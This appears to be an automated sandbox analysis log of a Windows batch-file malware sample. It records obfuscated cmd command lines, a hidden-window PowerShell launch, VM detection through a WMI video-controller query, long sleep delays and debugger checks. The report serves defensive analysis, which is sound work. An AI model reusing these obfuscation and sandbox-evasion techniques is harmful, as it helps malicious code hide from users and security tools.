Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.1775392519.000001FCBFBB0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.Management.Automation.pdba source: powershell.exe, 00000008.00000002.1774654668.000001FCBF8FB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Nf.pdbA source: powershell.exe, 00000008.00000002.1774654668.000001FCBF8FB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000008.00000002.1774654668.000001FCBF8FB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1775392519.000001FCBFBB0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: G_FORCE_FREE_LIBRARY.pdb source: powershell.exe, 00000008.00000002.1775392519.000001FCBFBB0000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Obfuscated command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c \"set __=^&rem\
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c \"set __=^&rem\
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c \"set __=^&rem\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c \"set __=^&rem\	Jump to behavior

Suspicious powershell command line found

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD9B790BF8 pushad ; retf	8_2_00007FFD9B790C6D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD9B790BCE pushad ; retf	8_2_00007FFD9B790C6D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD9B792335 push eax; iretd	8_2_00007FFD9B79237D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD9B7A095D push esp; retf	8_2_00007FFD9B7A095E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD9B797938 push ebx; retf	8_2_00007FFD9B79796A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD9B79785E push eax; iretd	8_2_00007FFD9B79786D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD9B7900BD pushad ; iretd	8_2_00007FFD9B7900C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD9B79776A pushad ; iretd	8_2_00007FFD9B79785D

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6178	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3692	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5502	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1071	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4080	Thread sleep count: 6178 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2736	Thread sleep count: 3692 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2664	Thread sleep time: -11990383647911201s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6284	Thread sleep count: 5502 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5772	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6284	Thread sleep count: 1071 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3760	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\Globalization\Sorting\sortdefault.nls	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SYSTEM32\MSVFW32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SYSTEM32\en-US\avicap32.dll.mui	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SYSTEM32\en-US\MSVFW32.dll.mui	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorwks.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\wbem\en-US\wmiutils.dll.mui	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c \"set __=^&rem\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\b.cmd"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c \"set __=^&rem\	Jump to behavior
